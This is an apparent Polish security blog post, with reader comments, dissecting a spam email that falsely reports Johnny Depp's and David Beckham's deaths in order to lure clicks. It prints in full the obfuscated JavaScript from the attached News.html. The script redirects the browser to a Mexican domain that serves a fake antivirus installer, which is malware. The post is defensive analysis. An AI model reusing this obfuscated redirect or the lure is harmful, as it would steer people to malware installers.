Z pewnego źródła (mail) posiadamy potwierdzone informacje, że David Beckham oraz Johny Deep zginęli wraz z 34 innymi ludźmi, gdy pasażerski samolot Air Force CT-43 „Bobcat” z grupą wycieczkową uderzył w zbocze góry. Tragedia miała miejsce podczas zbliżania się do lotniska Dubrownik w Chorwacji. Przyczyną wypadku były intensywne opady deszczu i zła widoczność.
Oczywiście tego typu mail otrzymałem abym żądnym sensacji kliknął w link zawarty w postaci załącznika. Temat Johnny Depp died ewidentnie skłania mnie do refleksji nad życiem i śmiercią więc co robię? Klikam. A w załączniku o nazwie News.html znajduje się magiczny kod JavaScript:
<!– C/C v0221 –><script>function j(){};var jC=37432;nL=false;j.prototype = {z : function() {this.m=””;this.b=false;this.u=””;this.r=56048;var l=33035;this.c=”c”;var y=document;this.bE=””;this.w=””;this.v=”;this.mT=””;this.s=”s”;e=46860;var x=y[String(„lo”+”ca”+”tiZw9V”.substr(0,2)+”on”)];this.p=”;q=”;yD=”yD”;this.zQ=”zQ”;d=”;this.zQK=””;x[new String(„hre3y9b”.substr(0,3)+”hv5f5hv”.substr(3,1))]=new String(„http:P5v”.substr(0,5)+”//panHSOY”.substr(0,5)+”3aPiplusP3a”.substr(3,5)+”.com.V4Hq”.substr(0,5)+”mx/1.0Xq”.substr(0,5)+”HFkhtmlFHk”.substr(3,4));o=”;this.pL=”;this.k=”;kH=false;this.uE=false;lA=61928;var n=false;}};this.vJ=45544;this.oD=””;var sN=new j(); f=false;jG=””;sN.z();this.eN=”eN”;</script>
który robi tyle, że kieruje do cetogilco cz cc, który w bardzo dużym uproszczeniu bo w końcu jest 6:55 i wróciłem z miasta więc sobie mogę na uproszczenia pozwolić kieruje do paniplus com mx gdzie otrzymujemy komunikat o strasznej katastrofie zwanej zawirusowaniem systemu i jedynym ratunkiem będzie instalacja aplikacji antyvirus.exe czyli virusa właśnie. Metoda stara ale jak wiadomo skuteczna odpowiednio. Nie zalecamy klikać, instalować, dotykać gdyż jest to kolejna próba oszukania użytkownika i nakłonienia go do wykonania akcji niezdrowej. A sam plik antyvirus.exe w połowie silników antywirusowych jest wykrywany jako zło, a w połowie nie :]
Whois:
Domain Name: paniplus com mx
Created On: 07-abr-1997
Expiration Date: 06-abr-2014
Last Updated On: 07-abr-2009
Registrar: NIC Mexico
URL: http://www.nic.mxRegistrant:
Name: PANIPLUS, S.A. DE CV.
City: QUERETARO
State: Queretaro
Country: MexicoAdministrative Contact:
Name: Victor Milke Garcia
City: QUERETARO
State: Queretaro
Country: MexicoTechnical Contact:
Name: Carlos Salazar Albornoz
City: Mexico
State: Distrito Federal
Country: MexicoBilling Contact:
Name: Victor Milke Garcia
City: QUERETARO
State: Queretaro
Country: MexicoName Servers:
DNS: ns1.secure.net
DNS: ns2.secure.net
6 komentarzy do
22 sierpnia, 2010 o godzinie 10:28
Przyznam, że analizowanie spamu po powrocie imprezy budzi mój głęboki podziw :)
22 sierpnia, 2010 o godzinie 13:49
Widocznie impreza była słaba.
22 sierpnia, 2010 o godzinie 16:12
Mnie dziwi, dlaczego firmy AV ewentualnie virustotal nie przesyła do wszystkich zainteresowanych działów informacji o nowych wirusach. Taka globalna baza pozwoliła by na lepszą ochronę użytkowników
22 sierpnia, 2010 o godzinie 19:24
Po pierwsze dlatego, że to jest każdy AV to konkurencja i chodzi o to by dany silnik był skuteczniejszy od innych, a VirusTotal, chyba wysyła do zainteresowanych. Mogłaby to być bardzo dobra opcja na monetyzację VT.
Zacytuję VT:
Collection and use of submitted files and personal information
When you submit a file to VirusTotal for scanning, we may store it and share it with the anti-malware and security industry (normally the companies that participate in VirusTotal receive the samples that their engines do not detect and are catalogued as malware by at least one other engine). The samples can be analysed by automatic tools and security analysts to detect malicious code and to improve antivirus engines.
22 sierpnia, 2010 o godzinie 19:25
Heheh, przeanalizowałem uprzednio wcześniej, po imprezie należało wyłącznie wszystko posklejać razem :]
24 sierpnia, 2010 o godzinie 11:04
[…] tego typu wiadomości otrzymałem w dniu dzisiejszym na skrzynkę mailową. Kilka dni temu opisywałem śmierć Deepa i Beckhama i jak widać poprzednia kampania przyniosła odpowiednie rezultaty. Żądna […]